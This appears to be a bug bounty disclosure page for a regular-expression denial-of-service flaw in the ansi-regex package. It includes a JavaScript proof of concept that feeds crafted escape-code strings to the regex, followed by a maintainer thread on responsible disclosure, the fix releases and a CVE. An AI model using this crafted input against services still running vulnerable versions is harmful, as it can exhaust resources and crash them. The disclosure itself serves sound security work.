Inefficient Regular Expression Complexity in chalk/ansi-regex

Valid

Reported on

Sep 9th 2021


✍️ Description

It allows cause a denial of service when matching crafted invalid ANSI escape codes.

🕵️‍♂️ Proof of Concept

// PoC.mjs
import ansiRegex from 'ansi-regex';


for(var i = 1; i <= 50000; i++) {
    var time = Date.now();
    var attack_str = "\u001B["+";".repeat(i*10000);
    ansiRegex().test(attack_str)
    var time_cost = Date.now() - time;
    console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms")
}

💥 Impact

This vulnerability is capable of exhausting system resources and leads to crashes.

Occurences

Yeting Li submitted a
3 months ago
Yeting Li
3 months ago

Researcher


Hi @admin, could you help me contact the maintainer to confirm the vulnerability and patch?

Ziding Zhang
3 months ago

Admin


Hey Yeting, of course. I've just sent security@tidelift.com an email, as per their security policy. I'll update you when we hear back from them.

We have contacted a member of the chalk/ansi-regex team and are waiting to hear back 3 months ago
Yeting Li
3 months ago

Researcher


Hi Ziding @admin, thanks for your efforts. The maintainer has now confirmed my disclosure and patch (see the commit).

Sindre Sorhus
3 months ago

@yetingli This is the second time you have been told to do a responsible closure. That means not submitting a pull request or open an issue until the report has been validated.

The severity (and IMHO bounty) in this report is also too high. The issue affects pretty much no one as ansi-regex is mostly used for command-line tools, not in servers.

Yeting Li
3 months ago

Researcher


Thank you for your reply@Sindre Sorhus. I just did a responsible closure on huntr.dev, but I accidentally pulled when I submitted the patch. Thank you again for your reminder!

Yeting Li
3 months ago

Researcher


The bounty setting may be related to the popularity of the project? I'm not sure, you@Sindre Sorhus can ask @admin?

Sindre Sorhus validated this vulnerability 3 months ago
Yeting Li has been awarded the disclosure bounty
The fix bounty is now up for grabs
Sindre Sorhus confirmed that a fix has been merged on 8d1d7c 3 months ago
Yeting Li has been awarded the fix bounty
index.js#L3 has been validated
Sindre Sorhus
3 months ago

Fixed in:

  • 6.0.1: https://github.com/chalk/ansi-regex/releases/tag/v6.0.1
  • 5.0.1: https://github.com/chalk/ansi-regex/releases/tag/v5.0.1
Jamie Slome
3 months ago

Admin


CVE published! 🎉

Yeting Li
3 months ago

Researcher


Thanks.